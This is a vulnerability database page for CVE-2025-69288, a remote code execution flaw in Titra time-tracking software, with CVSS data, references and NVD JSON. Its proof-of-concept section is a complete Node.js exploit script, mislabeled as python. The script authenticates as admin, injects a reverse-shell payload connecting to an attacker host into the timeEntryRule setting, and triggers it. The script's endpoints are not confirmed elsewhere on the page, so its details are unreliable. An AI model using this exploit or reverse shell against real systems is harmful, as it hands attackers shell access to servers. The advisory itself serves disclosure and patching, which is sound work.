CVE-2025-69288

Description

Titra is open source project time tracking software. Prior to version 0.99.49, Titra allows any authenticated Admin user to modify the timeEntryRule in the database. The value is then passed to a NodeVM value to execute as code. Without sanitization, it leads to a Remote Code Execution. Version 0.99.49 fixes the issue.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:* - VULNERABLE

Titra < 0.99.49

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-69288 PoC - Titra RCE via timeEntryRule injection // This PoC demonstrates how to exploit the vulnerability // Note: Requires authenticated admin access const axios = require('axios'); // Configuration const TITRA_URL = 'http://target-server:3000'; const ATTACKER_IP = 'attacker-ip'; const ATTACKER_PORT = '4444'; // Step 1: Authenticate as admin async function authenticate() { const response = await axios.post(`${TITRA_URL}/api/auth/login`, { email: '[email protected]', password: 'admin-password' }); return response.data.token; } // Step 2: Inject malicious code into timeEntryRule async function injectPayload(token) { // Reverse shell payload const payload = ` const net = require('net'); const cp = require('child_process'); const client = new net.Socket(); client.connect(${ATTACKER_PORT}, '${ATTACKER_IP}', () => { client.pipe(cp.spawn('sh', {stdio: [0, 1, 2]}).stdin); }); `; // Update timeEntryRule with malicious code await axios.put( `${TITRA_URL}/api/settings/timeEntryRule`, { value: payload }, { headers: { Authorization: `Bearer ${token}` } } ); console.log('[+] Malicious payload injected into timeEntryRule'); } // Step 3: Trigger the execution async function triggerExecution(token) { // Trigger timeEntryRule evaluation await axios.post( `${TITRA_URL}/api/time-entries/evaluate-rules`, {}, { headers: { Authorization: `Bearer ${token}` } } ); console.log('[+] Payload triggered - check your listener'); } // Main execution (async () => { try { const token = await authenticate(); await injectPayload(token); await triggerExecution(token); } catch (error) { console.error('[-] Exploitation failed:', error.message); } })();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69288
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69288
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69288/
[4] VulDB https://vuldb.com/cve/CVE-2025-69288
[5] https://github.com/kromitgmbh/titra/commit/2e2ac5cbeed47a76720b21c7fde0214a242e065e
[6] https://github.com/kromitgmbh/titra/releases/tag/0.99.49
[7] https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr
[8] https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69288", "sourceIdentifier": "[email protected]", "published": "2025-12-31T22:15:49.410", "lastModified": "2026-01-13T15:25:44.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Titra is open source project time tracking software. Prior to version 0.99.49, Titra allows any authenticated Admin user to modify the timeEntryRule in the database. The value is then passed to a NodeVM value to execute as code. Without sanitization, it leads to a Remote Code Execution. Version 0.99.49 fixes the issue."}, {"lang": "es", "value": "Titra es un software de seguimiento de tiempo de proyectos de código abierto. Antes de la versión 0.99.49, Titra permite a cualquier usuario administrador autenticado modificar la timeEntryRule en la base de datos. El valor es entonces pasado a un valor de NodeVM para ejecutarse como código. Sin sanitización, esto lleva a una Ejecución Remota de Código. La versión 0.99.49 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.99.49", "matchCriteriaId": "37C388F6-B08A-47B0-A47E-F4543158100B"}]}]}], "references": [{"url": "https://github.com/kromitgmbh/titra/commit/2e2ac5cbeed47a76720b21c7fde0214a242e065e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kromitgmbh/titra/releases/tag/0.99.49", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}